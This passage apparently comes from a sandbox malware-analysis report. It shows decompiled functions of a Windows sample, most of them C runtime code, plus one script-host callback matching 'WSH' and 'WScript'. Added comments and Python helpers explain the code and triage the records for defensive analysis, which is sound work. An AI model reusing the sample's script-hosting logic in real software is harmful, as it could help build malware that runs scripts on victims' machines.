                                                  						while( *((intOrPtr*)(_t270 + _t211)) != _t242) {
                                                  							_t211 =  &(_t211->Internal);
                                                  							if(_t211 < 5) {
                                                  								continue;
                                                  							}
                                                  							break;
                                                  						}
                                                  						_t272 = _v96 - _t277;
                                                  						_v40 = _t211;
                                                  						if(_t211 <= 0) {
                                                  							_t72 = ( *_t277 & 0x000000ff) + 0x4157d8; // 0x0
                                                  							_t255 =  *_t72 + 1;
                                                  							_v48 = _t255;
                                                  							__eflags = _t255 - _t272;
                                                  							if(_t255 > _t272) {
                                                  								__eflags = _t272;
                                                  								if(_t272 <= 0) {
                                                  									goto L40;
                                                  								} else {
                                                  									_t287 = _v44;
                                                  									do {
                                                  										 *((char*)( *((intOrPtr*)(0x416108 + _v80 * 4)) + _t287 + _t242 + 0x2e)) =  *((intOrPtr*)(_t242 + _t277));
                                                  										_t242 =  &(_t242->Internal);
                                                  										__eflags = _t242 - _t272;
                                                  									} while (_t242 < _t272);
                                                  									goto L39;
                                                  								}
                                                  							} else {
                                                  								_v144 = _t242;
                                                  								__eflags = _t255 - 4;
                                                  								_v140 = _t242;
                                                  								_v56 = _t277;
                                                  								_v40 = (_t255 == 4) + 1;
                                                  								_t220 = E0040B88A( &_v144,  &_v76,  &_v56, (_t255 == 4) + 1,  &_v144);
                                                  								_t296 = _t295 + 0x10;
                                                  								__eflags = _t220 - 0xffffffff;
                                                  								if(_t220 == 0xffffffff) {
                                                  									goto L48;
                                                  								} else {
                                                  									_t288 = _v48;
                                                  									goto L18;
                                                  								}
                                                  							}
                                                  						} else {
                                                  							_t224 =  *((char*)(( *(_t250 + _v48 + 0x2e) & 0x000000ff) + 0x4157d8)) + 1;
                                                  							_v56 = _t224;
                                                  							_t225 = _t224 - _v40;
                                                  							_v48 = _t225;
                                                  							if(_t225 > _t272) {
                                                  								__eflags = _t272;
                                                  								if(_t272 > 0) {
                                                  									_t289 = _t250;
                                                  									do {
                                                  										_t227 =  *((intOrPtr*)(_t242 + _t277));
                                                  										_t261 =  *((intOrPtr*)(0x416108 + _v80 * 4)) + _t289 + _t242;
                                                  										_t242 =  &(_t242->Internal);
                                                  										 *((char*)(_t261 + _v40 + 0x2e)) = _t227;
                                                  										_t289 = _v44;
                                                  										__eflags = _t242 - _t272;
                                                  									} while (_t242 < _t272);
                                                  									L39:
                                                  									_t282 = _v88;
                                                  								}
                                                  								L40:
                                                  								_t286 = _t282 + _t272;
                                                  								__eflags = _t286;
                                                  								L41:
                                                  								__eflags = _v60;
                                                  								_v88 = _t286;
                                                  							} else {
                                                  								_t273 = _v40;
                                                  								_t291 = _t242;
                                                  								_t262 = _v116;
                                                  								do {
                                                  									 *((char*)(_t294 + _t291 - 0xc)) =  *((intOrPtr*)(_t262 + _t291));
                                                  									_t291 =  &(_t291->Internal);
                                                  								} while (_t291 < _t273);
                                                  								_t292 = _v48;
                                                  								_t263 = _v44;
                                                  								if(_v48 > 0) {
                                                  									E0040DE00( &_v16 + _t273, _t277, _t292);
                                                  									_t263 = _v44;
                                                  									_t295 = _t295 + 0xc;
                                                  									_t273 = _v40;
                                                  								}
                                                  								_t280 = _v80;
                                                  								_t293 = _t242;
                                                  								do {
                                                  									 *( *((intOrPtr*)(0x416108 + _t280 * 4)) + _t263 + _t293 + 0x2e) = _t242;
                                                  									_t293 =  &(_t293->Internal);
                                                  								} while (_t293 < _t273);
                                                  								_t277 = _v104;
                                                  								_t288 = _v48;
                                                  								_v120 =  &_v16;
                                                  								_v136 = _t242;
                                                  								_v132 = _t242;
                                                  								_v40 = (_v56 == 4) + 1;
                                                  								_t237 = E0040B88A( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
                                                  								_t296 = _t295 + 0x10;
                                                  								if(_t237 == 0xffffffff) {
                                                  									goto L48;
                                                  								} else {
                                                  									L18:
                                                  									_t277 = _t277 - 1 + _t288;
                                                  									L27:
                                                  									_t277 =  &(_t277[1]);
                                                  									_v104 = _t277;
                                                  									_t193 = E00407FFF(_v124, _t242,  &_v76, _v40,  &_v32, 5, _t242, _t242);
                                                  									_t295 = _t296 + 0x20;
                                                  									_v56 = _t193;
                                                  									if(_t193 == 0) {
                                                  										goto L48;
                                                  									} else {
                                                  										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t242) == 0) {
                                                  											L47:
                                                  											_v92 = GetLastError();
                                                  											goto L48;
                                                  										} else {
                                                  											_t282 = _v84 - _v108 + _t277;
                                                  											_v88 = _t282;
                                                  											if(_v100 < _v56) {
                                                  												goto L48;
                                                  											} else {
                                                  												if(_v51 != 0xa) {
                                                  													L34:
                                                  													if(_t277 >= _v96) {
                                                  														goto L48;
                                                  													} else {
                                                  														_t247 = _v128;
                                                  														continue;
                                                  													}
                                                  												} else {
                                                  													_t198 = 0xd;
                                                  													_v52 = _t198;
                                                  													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t242) == 0) {
                                                  														goto L47;
                                                  													} else {
                                                  														if(_v100 < 1) {
                                                  															goto L48;
                                                  														} else {
                                                  															_v84 = _v84 + 1;
                                                  															_t282 = _t282 + 1;
                                                  															_v88 = _t282;
                                                  															goto L34;
                                                  														}
                                                  													}
                                                  												}
                                                  											}
                                                  										}
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  						goto L49;
                                                  						L19:
                                                  						_t267 =  *((intOrPtr*)(_t250 + _t186 + 0x2d));
                                                  						__eflags = _t267 & 0x00000004;
                                                  						if((_t267 & 0x00000004) == 0) {
                                                  							_v33 =  *_t277;
                                                  							_t188 = E0040892C(_t267);
                                                  							_t251 = _v33 & 0x000000ff;
                                                  							__eflags =  *((intOrPtr*)(_t188 + _t251 * 2)) - _t242;
                                                  							if( *((intOrPtr*)(_t188 + _t251 * 2)) >= _t242) {
                                                  								_push(1);
                                                  								_push(_t277);
                                                  								goto L26;
                                                  							} else {
                                                  								_t100 =  &(_t277[1]); // 0x1
                                                  								_t202 = _t100;
                                                  								_v56 = _t202;
                                                  								__eflags = _t202 - _v96;
                                                  								if(_t202 >= _v96) {
                                                  									_t274 = _v80;
                                                  									_t253 = _v44;
                                                  									 *((char*)(_t253 +  *((intOrPtr*)(0x416108 + _t274 * 4)) + 0x2e)) = _v33;
                                                  									 *(_t253 +  *((intOrPtr*)(0x416108 + _t274 * 4)) + 0x2d) =  *(_t253 +  *((intOrPtr*)(0x416108 + _t274 * 4)) + 0x2d) | 0x00000004;
                                                  									_t286 = _t282 + 1;
                                                  									goto L41;
                                                  								} else {
                                                  									_t206 = E0040A0A2( &_v76, _t277, 2);
                                                  									_t296 = _t295 + 0xc;
                                                  									__eflags = _t206 - 0xffffffff;
                                                  									if(_t206 == 0xffffffff) {
                                                  										goto L48;
                                                  									} else {
                                                  										_t277 = _v56;
                                                  										goto L27;
                                                  									}
                                                  								}
                                                  							}
                                                  						} else {
                                                  							_v24 =  *((intOrPtr*)(_t250 + _t186 + 0x2e));
                                                  							_v23 =  *_t277;
                                                  							_push(2);
                                                  							 *(_t250 + _v48 + 0x2d) = _t267 & 0x000000fb;
                                                  							_push( &_v24);
                                                  							L26:
                                                  							_push( &_v76);
                                                  							_t190 = E0040A0A2();
                                                  							_t296 = _t295 + 0xc;
                                                  							__eflags = _t190 - 0xffffffff;
                                                  							if(_t190 == 0xffffffff) {
                                                  								goto L48;
                                                  							} else {
                                                  								goto L27;
                                                  							}
                                                  						}
                                                  						goto L49;
                                                  					}
                                                  				}
                                                  				L49:
                                                  				if(__eflags != 0) {
                                                  					_t183 = _v72;
                                                  					_t165 = _t183 + 0x350;
                                                  					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
                                                  					__eflags =  *_t165;
                                                  				}
                                                  				__eflags = _v8 ^ _t294;
                                                  				asm("movsd");
                                                  				asm("movsd");
                                                  				asm("movsd");
                                                  				return E004032D1(_v8 ^ _t294);
                                                  			}
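Reading the listing above: the `fh >> 6` / `fh & 0x3f` / `* 0x38` arithmetic with a table at 0x416108, the read of a handle at slot offset 0x18, the `GetConsoleOutputCP` call, the comparison of the locale code page with 0xfde9 (65001, CP_UTF8), an eight-argument call shaped like `WideCharToMultiByte` into a 5-byte buffer, the `WriteFile` of the result, and the extra single-byte `WriteFile` of 0x0d whenever the source byte was 0x0a, together look like the C runtime's text-mode console write path operating on its per-handle lowio table. That identification is mine, not the report's; if it holds, the function is statically linked runtime code rather than sample-specific logic, which is the usual reason to skip it during triage. The following added example (not from the report or the sample) models what the loop does under that reading, including the edge case the listing handles with the flag byte at offset 0x2d and the 5-byte buffer at 0x2e: a multibyte sequence cut off at the end of one call is stashed and completed on the next call. The slot layout names are assumed from the UCRT x86 structure, and the CR-after-LF order is the one the listing shows.

```python
"""Model of the decompiled loop above (added example; the CRT reading is assumed)."""
import codecs

CP_UTF8 = 0xFDE9  # the value the locale code page is compared with in the listing (65001)

# Assumed: the fh >> 6 / fh & 0x3f / * 0x38 arithmetic is the runtime's per-handle
# table lookup, and the slot offsets read in the listing mean (x86 layout, assumed):
IOINFO_L2E = 6
IOINFO_ARRAY_ELTS = 1 << IOINFO_L2E
IOINFO_SIZE = 0x38
SLOT_FIELDS = {
    0x18: "OS handle passed to WriteFile",
    0x2d: "flag byte; 0x04 = a partial multibyte sequence is stashed",
    0x2e: "5-byte stash for that partial sequence",
}


def lowio_slot(fh: int) -> tuple:
    """(bucket index, byte offset inside the bucket) as the listing computes them."""
    return fh >> IOINFO_L2E, (fh & (IOINFO_ARRAY_ELTS - 1)) * IOINFO_SIZE


class Slot:
    """Per-handle state the listing keeps: the partial-sequence stash (flag 0x04 + 5 bytes).
    An incremental decoder plays the role of the stash."""

    def __init__(self, ansi_cp: str):
        self.decoder = codecs.getincrementaldecoder(ansi_cp)()

    @property
    def stash_used(self) -> bool:
        # Mirrors flag 0x04: bytes are pending from the previous call.
        return bool(self.decoder.getstate()[0])


def console_text_write(slot: Slot, data: bytes, console_cp: str) -> bytes:
    """Bytes that reach WriteFile for one call: each source character is widened with
    the locale code page, narrowed again with the console code page, and a lone CR
    follows each LF (the order the listing shows). A trailing partial multibyte
    sequence is kept in the slot for the next call instead of being written."""
    out = bytearray()
    for ch in slot.decoder.decode(data):
        # WideCharToMultiByte with the default replacement character for unmappable input.
        out += ch.encode(console_cp, errors="replace")
        if ch == "\n":
            out += b"\r"
    return bytes(out)


if __name__ == "__main__":
    print(lowio_slot(3))                        # (0, 0xa8): bucket 0, third slot
    s = Slot("cp1252")
    print(console_text_write(s, b"caf\xe9\n", "cp437"))   # b'caf\x82\n\r'
    u = Slot("utf-8")
    print(console_text_write(u, b"caf\xc3", "cp437"), u.stash_used)  # b'caf' True
    print(console_text_write(u, b"\xa9\n", "cp437"), u.stash_used)   # b'\x82\n\r' False
```

The split UTF-8 write is the case that exercises the stash: the first call emits only the complete characters and leaves the lead byte 0xc3 pending (flag set), the second call completes it and the character reaches the console as cp437 0x82.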
Instruction address column for the listing above (shown beside each C line in the original report; the text extraction detached it from the code). The addresses run from 0x0040ab43 to 0x0040aebb inside E0040AB38; 0x00000000 entries carry no address.
                                                  0x0040ac9c
                                                  0x0040aca7
                                                  0x0040acac
                                                  0x0040acb2
                                                  0x00000000
                                                  0x0040acb8
                                                  0x0040ad0f
                                                  0x0040ad10
                                                  0x0040ad93
                                                  0x0040ad9a
                                                  0x0040ada2
                                                  0x0040adaa
                                                  0x0040adaf
                                                  0x0040adb2
                                                  0x0040adb7
                                                  0x00000000
                                                  0x0040adbd
                                                  0x0040add2
                                                  0x0040aeb2
                                                  0x0040aeb8
                                                  0x00000000
                                                  0x0040add8
                                                  0x0040ade1
                                                  0x0040ade3
                                                  0x0040ade9
                                                  0x00000000
                                                  0x0040adef
                                                  0x0040adf3
                                                  0x0040ae29
                                                  0x0040ae2c
                                                  0x00000000
                                                  0x0040ae32
                                                  0x0040ae32
                                                  0x00000000
                                                  0x0040ae32
                                                  0x0040adf5
                                                  0x0040adf7
                                                  0x0040adf9
                                                  0x0040ae12
                                                  0x00000000
                                                  0x0040ae18
                                                  0x0040ae1c
                                                  0x00000000
                                                  0x0040ae22
                                                  0x0040ae22
                                                  0x0040ae25
                                                  0x0040ae26
                                                  0x00000000
                                                  0x0040ae26
                                                  0x0040ae1c
                                                  0x0040ae12
                                                  0x0040adf3
                                                  0x0040ade9
                                                  0x0040add2
                                                  0x0040adb7
                                                  0x0040acb2
                                                  0x0040ac24
                                                  0x00000000
                                                  0x0040ad14
                                                  0x0040ad14
                                                  0x0040ad18
                                                  0x0040ad1b
                                                  0x0040ad3d
                                                  0x0040ad40
                                                  0x0040ad45
                                                  0x0040ad49
                                                  0x0040ad4d
                                                  0x0040ad7b
                                                  0x0040ad7d
                                                  0x00000000
                                                  0x0040ad4f
                                                  0x0040ad4f
                                                  0x0040ad4f
                                                  0x0040ad52
                                                  0x0040ad55
                                                  0x0040ad58
                                                  0x0040ae8f
                                                  0x0040ae92
                                                  0x0040ae9f
                                                  0x0040aeaa
                                                  0x0040aeaf
                                                  0x00000000
                                                  0x0040ad5e
                                                  0x0040ad65
                                                  0x0040ad6a
                                                  0x0040ad6d
                                                  0x0040ad70
                                                  0x00000000
                                                  0x0040ad76
                                                  0x0040ad76
                                                  0x00000000
                                                  0x0040ad76
                                                  0x0040ad70
                                                  0x0040ad58
                                                  0x0040ad1d
                                                  0x0040ad24
                                                  0x0040ad29
                                                  0x0040ad2f
                                                  0x0040ad31
                                                  0x0040ad38
                                                  0x0040ad7e
                                                  0x0040ad81
                                                  0x0040ad82
                                                  0x0040ad87
                                                  0x0040ad8a
                                                  0x0040ad8d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040ad8d
                                                  0x00000000
                                                  0x0040ad1b
                                                  0x0040abb6
                                                  0x0040aebe
                                                  0x0040aebe
                                                  0x0040aec0
                                                  0x0040aec3
                                                  0x0040aec3
                                                  0x0040aec3
                                                  0x0040aec3
                                                  0x0040aed5
                                                  0x0040aed7
                                                  0x0040aed8
                                                  0x0040aed9
                                                  0x0040aee3

                                                  APIs
                                                  • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 0040AB80
                                                  • __fassign.LIBCMT ref: 0040AD65
                                                  • __fassign.LIBCMT ref: 0040AD82
                                                  • WriteFile.KERNEL32(?,00409851,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040ADCA
                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0040AE0A
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040AEB2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp
                                                   • Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 1735259414-0
                                                  • Opcode ID: d9a5e50a9b91e5dd8f8e49a72057e3a426c3303484b3f58c884a4c7180e47011
                                                  • Instruction ID: 3117e9bacb1a1eccba6a9d08f52151470d89b525a91c6c0243df8fed3a777442
                                                  • Opcode Fuzzy Hash: d9a5e50a9b91e5dd8f8e49a72057e3a426c3303484b3f58c884a4c7180e47011
                                                  • Instruction Fuzzy Hash: 52C19F71D042589FCF14CFA8C8849EEBBB5EF08314F28417AE855BB381D2359D56CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 25%
                                                   			/* MSVC CRT exit helper (library code, not sample-specific): if mscoree.dll is already
                                                   			   loaded, i.e. the process hosts the .NET runtime, resolve CorExitProcess and call it
                                                   			   with the exit code before the native exit path continues. The indirect call through
                                                   			   *0x40f16c is most likely the CFG __guard_check_icall_fptr stub; the decompiler has
                                                   			   attached the exit-code argument to it rather than to the CorExitProcess call. */
                                                   			E00405FD3(void* __ecx, intOrPtr _a4) {
                                                  				signed int _v8;
                                                  				_Unknown_base(*)()* _t8;
                                                  				_Unknown_base(*)()* _t14;
                                                  
                                                  				_v8 = _v8 & 0x00000000;
                                                  				_t8 =  &_v8;
                                                  				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
                                                  				if(_t8 != 0) {
                                                  					_t8 = GetProcAddress(_v8, "CorExitProcess");
                                                  					_t14 = _t8;
                                                  					if(_t14 != 0) {
                                                  						 *0x40f16c(_a4);
                                                  						_t8 =  *_t14();
                                                  					}
                                                  				}
                                                  				if(_v8 != 0) {
                                                  					return FreeLibrary(_v8);
                                                  				}
                                                  				return _t8;
                                                  			}






                                                   (per-line instruction addresses for this function, 0x00405fd9 to 0x00406025, not reproduced: the instruction text was not captured in this export)

                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00405F85,?,?,00405F4D,?,?,?), ref: 00405FE8
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00405FFB
                                                  • FreeLibrary.KERNEL32(00000000,?,?,00405F85,?,?,00405F4D,?,?,?), ref: 0040601E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp
                                                   • Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: c3d37bd2113eb20495809b35d6cd8355e5e6d3b71c3d77ae0755e8c65ab35b8d
                                                  • Instruction ID: 52b69b0a254760e163a2c2203ff1c395fca13042c5b59be6e0adffc2ece0bb65
                                                  • Opcode Fuzzy Hash: c3d37bd2113eb20495809b35d6cd8355e5e6d3b71c3d77ae0755e8c65ab35b8d
                                                  • Instruction Fuzzy Hash: 32F08230541119FBDB31DB50DE09B9EBEB8DB44755F104072E505F65E1DB748E08DB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                   			/* COM-style callback (sample logic, not CRT boilerplate): accepts only the item
                                                   			   names "WSH" and "WScript" and returns S_OK for them, E_FAIL (0x80004005) for
                                                   			   anything else. When bit 0x2 of the mask argument is set it calls vtable slot 1
                                                   			   (IUnknown::AddRef) on the global object at 0x416648 and returns that object
                                                   			   through the last out-parameter. The signature and the 0x2 mask check match the
                                                   			   shape of IActiveScriptSite::GetItemInfo, so this function is worth a closer look
                                                   			   when triaging the sample. */
                                                   			E00401040(WCHAR* _a8, signed int _a12, intOrPtr* _a20) {
                                                  				intOrPtr _t9;
                                                  				intOrPtr* _t14;
                                                  				intOrPtr _t20;
                                                  
                                                  				if(lstrcmpW(_a8, ?str?) == 0 || lstrcmpW(_a8, L"WScript") == 0) {
                                                  					if((_a12 & 0x00000002) != 0) {
                                                  						_t9 =  *0x416648; // 0x0
                                                  						_t14 =  *0x416648; // 0x0
                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_t14 + 4))))(_t9);
                                                  						_t20 =  *0x416648; // 0x0
                                                  						 *_a20 = _t20;
                                                  					}
                                                  					return 0;
                                                  				} else {
                                                  					return 0x80004005;
                                                  				}
                                                  			}






                                                   (per-line instruction addresses for this function, 0x00401054 to 0x00401094, not reproduced: the instruction text was not captured in this export)

                                                  APIs
                                                  • lstrcmpW.KERNEL32(?,WSH), ref: 0040104C
                                                  • lstrcmpW.KERNEL32(?,WScript), ref: 0040105F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp
                                                   • Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: lstrcmp
                                                  • String ID: WSH$WScript
                                                  • API String ID: 1534048567-1019903269
                                                  • Opcode ID: 3d1b1173d72ddb053b1d78bf1996fd8c99da78053f9083405743fbba01ee82a7
                                                  • Instruction ID: 34979e90e217bb9efdcdefbd136419db47cfe3186b12309ac817f8e3bf5d9e80
                                                  • Opcode Fuzzy Hash: 3d1b1173d72ddb053b1d78bf1996fd8c99da78053f9083405743fbba01ee82a7
                                                  • Instruction Fuzzy Hash: F6F058753002049BC720CFA4DC51EAB37A9AB89350351C13AFA05EB7B1C636E880CBA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
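The per-function records on this page (the bullet lines under "APIs" and "Similarity") are what a triager actually scans when a report lists several hundred decompiled functions, most of them MSVC runtime. The script below is an added example and is not part of the Joe Sandbox report or its tooling: it parses those records from a constructed excerpt copied from this page, separates runtime boilerplate (.LIBCMT/.LIBVCRUNTIME references, the CRT's mscoree.dll/CorExitProcess exit path, CONOUT$ handling) from functions that carry sample-specific logic such as the "WSH"/"WScript" comparison, and keeps the API String ID and Instruction Fuzzy Hash so a match can be looked up across reports. The runtime-marker sets are this example's own heuristics, not something the report defines.

```python
"""Parse Joe Sandbox per-function API records and separate CRT boilerplate
from sample logic.  Added example, not part of the report or its tooling."""
import re
from dataclasses import dataclass, field
from typing import List, Tuple

# One bullet under "APIs": name.MODULE(args), ref: ADDRESS (args are optional for .LIBCMT-style refs)
API_LINE = re.compile(r"^•\s+(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
                      r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]{8})$")
# One bullet under "Similarity": "Key: value"
FIELD_LINE = re.compile(r"^•\s+(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")

RUNTIME_MODULES = {"LIBCMT", "LIBCMTD", "LIBVCRUNTIME"}                   # heuristic: static CRT refs
RUNTIME_STRINGS = {"mscoree.dll", "CorExitProcess", "CONOUT$", "CONIN$"}  # heuristic: CRT-only strings

# Constructed excerpt: three records copied from this page, in the report's own layout.
SAMPLE_REPORT = """\
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00405F85,?,?,00405F4D,?,?,?), ref: 00405FE8
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00405FFB
• FreeLibrary.KERNEL32(00000000,?,?,00405F85,?,?,00405F4D,?,?,?), ref: 0040601E
Similarity
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
• lstrcmpW.KERNEL32(?,WSH), ref: 0040104C
• lstrcmpW.KERNEL32(?,WScript), ref: 0040105F
Similarity
• String ID: WSH$WScript
• API String ID: 1534048567-1019903269
• Instruction Fuzzy Hash: F6F058753002049BC720CFA4DC51EAB37A9AB89350351C13AFA05EB7B1C636E880CBA8
APIs
• ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00404DD6
• ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00404DE0
  • Part of subcall function 00405149: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0040515A
Similarity
• String ID:
• API String ID: 1761009282-0
"""


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int          # address of the call site inside the function


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    api_string_id: str = ""
    fuzzy_hash: str = ""


def parse_records(text: str) -> List[FunctionRecord]:
    """Split report text into one FunctionRecord per 'APIs' block."""
    records: List[FunctionRecord] = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue
        m = API_LINE.match(line)
        if m:  # "• Part of subcall ..." bullets belong to other functions; they do not match and are skipped
            args = [a for a in (m.group("args") or "").split(",") if a]
            current.apis.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16)))
            continue
        f = FIELD_LINE.match(line)
        if not f:
            continue
        key, value = f.group("key"), f.group("value").strip()
        if key == "String ID":
            current.strings = [s for s in value.split("$") if s]   # report joins strings with '$'
        elif key == "API String ID":
            current.api_string_id = value
        elif key == "Instruction Fuzzy Hash":
            current.fuzzy_hash = value
    return records


def classify(rec: FunctionRecord) -> str:
    """'runtime' for MSVC CRT/VCRuntime helpers, 'review' for anything else."""
    if any(c.module in RUNTIME_MODULES or c.name.startswith("__") for c in rec.apis):
        return "runtime"
    if rec.strings and set(rec.strings) <= RUNTIME_STRINGS:
        return "runtime"
    return "review"


def triage(text: str) -> List[Tuple[str, str, List[str], List[str]]]:
    """(api_string_id, label, api names, strings) per record, 'review' entries first."""
    rows = [(r.api_string_id, classify(r), [c.name for c in r.apis], r.strings) for r in parse_records(text)]
    rows.sort(key=lambda row: row[1] != "review")   # stable sort keeps report order within each label
    return rows


if __name__ == "__main__":
    for api_string_id, label, names, strings in triage(SAMPLE_REPORT):
        print(f"{label:8} {api_string_id:22} {', '.join(names)}  strings={strings}")
```

Run against a whole report the "review" rows are the short list to read first; the API String ID and fuzzy hash columns are what to pivot on when the same function turns up in another sample's report.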

                                                  C-Code - Quality: 100%
                                                   			/* MSVC CRT console write (library code, not sample-specific): WriteConsoleW to the
                                                   			   cached CONOUT$ handle stored at 0x4158e0. If that fails with ERROR_INVALID_HANDLE (6),
                                                   			   the stale handle is closed (E0040BFFF), the console is reopened via ___initconout
                                                   			   (E0040BFC1, CreateFileW("CONOUT$")) and the write is retried once. */
                                                   			E0040C016(void* _a4, long _a8, DWORD* _a12) {
                                                  				void* _t13;
                                                  
                                                  				_t13 = WriteConsoleW( *0x4158e0, _a4, _a8, _a12, 0);
                                                  				if(_t13 == 0 && GetLastError() == 6) {
                                                  					E0040BFFF();
                                                  					E0040BFC1();
                                                  					_t13 = WriteConsoleW( *0x4158e0, _a4, _a8, _a12, _t13);
                                                  				}
                                                  				return _t13;
                                                  			}




                                                   (per-line instruction addresses for this function, 0x0040c033 to 0x0040c06a, not reproduced: the instruction text was not captured in this export)

                                                  APIs
                                                  • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,0040BA75,?,00000001,?,00000001,?,0040AF0F,?,?,00000001), ref: 0040C02D
                                                  • GetLastError.KERNEL32(?,0040BA75,?,00000001,?,00000001,?,0040AF0F,?,?,00000001,?,00000001,?,0040B45B,00409851), ref: 0040C039
                                                    • Part of subcall function 0040BFFF: CloseHandle.KERNEL32(FFFFFFFE,0040C049,?,0040BA75,?,00000001,?,00000001,?,0040AF0F,?,?,00000001,?,00000001), ref: 0040C00F
                                                  • ___initconout.LIBCMT ref: 0040C049
                                                    • Part of subcall function 0040BFC1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0040BFF0,0040BA62,00000001,?,0040AF0F,?,?,00000001,?), ref: 0040BFD4
                                                  • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,0040BA75,?,00000001,?,00000001,?,0040AF0F,?,?,00000001,?), ref: 0040C05E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp
                                                   • Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                  • String ID:
                                                  • API String ID: 2744216297-0
                                                  • Opcode ID: b9f5e9a20dda26c641918b02f6eb4ee4fadd195ea0e1155ce4a99e2be7c18c92
                                                  • Instruction ID: 4996e835260c841a90815513ba75f6a0946b9942c97af0d737ffc775e5ba3932
                                                  • Opcode Fuzzy Hash: b9f5e9a20dda26c641918b02f6eb4ee4fadd195ea0e1155ce4a99e2be7c18c92
                                                  • Instruction Fuzzy Hash: 6DF01C36501119FBCF222FD1DC049CA3F66FF487B0B048131FA18A6161C6328960EB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                   			/* VCRuntime startup, __vcrt_initialize (library code, not sample-specific): installs the
                                                   			   pure-virtual-call handler and the WinAPI thunks, then initialises the runtime locks.
                                                   			   Returns 1 on success; if the second initialisation step fails the locks are torn down
                                                   			   again (___vcrt_uninitialize_locks) and 0 is returned. */
                                                   			E00404DD6() {
                                                  				void* _t4;
                                                  				void* _t8;
                                                  
                                                  				E00405455();
                                                  				E004053E9();
                                                  				if(E00405149() != 0) {
                                                  					_t4 = E004050FB(_t8, __eflags);
                                                  					__eflags = _t4;
                                                  					if(_t4 != 0) {
                                                  						return 1;
                                                  					} else {
                                                  						E00405185();
                                                  						goto L1;
                                                  					}
                                                  				} else {
                                                  					L1:
                                                  					return 0;
                                                  				}
                                                  			}





                                                   (per-line instruction addresses for this function, 0x00404dd6 to 0x00404dfe, not reproduced: the instruction text was not captured in this export)

                                                  APIs
                                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00404DD6
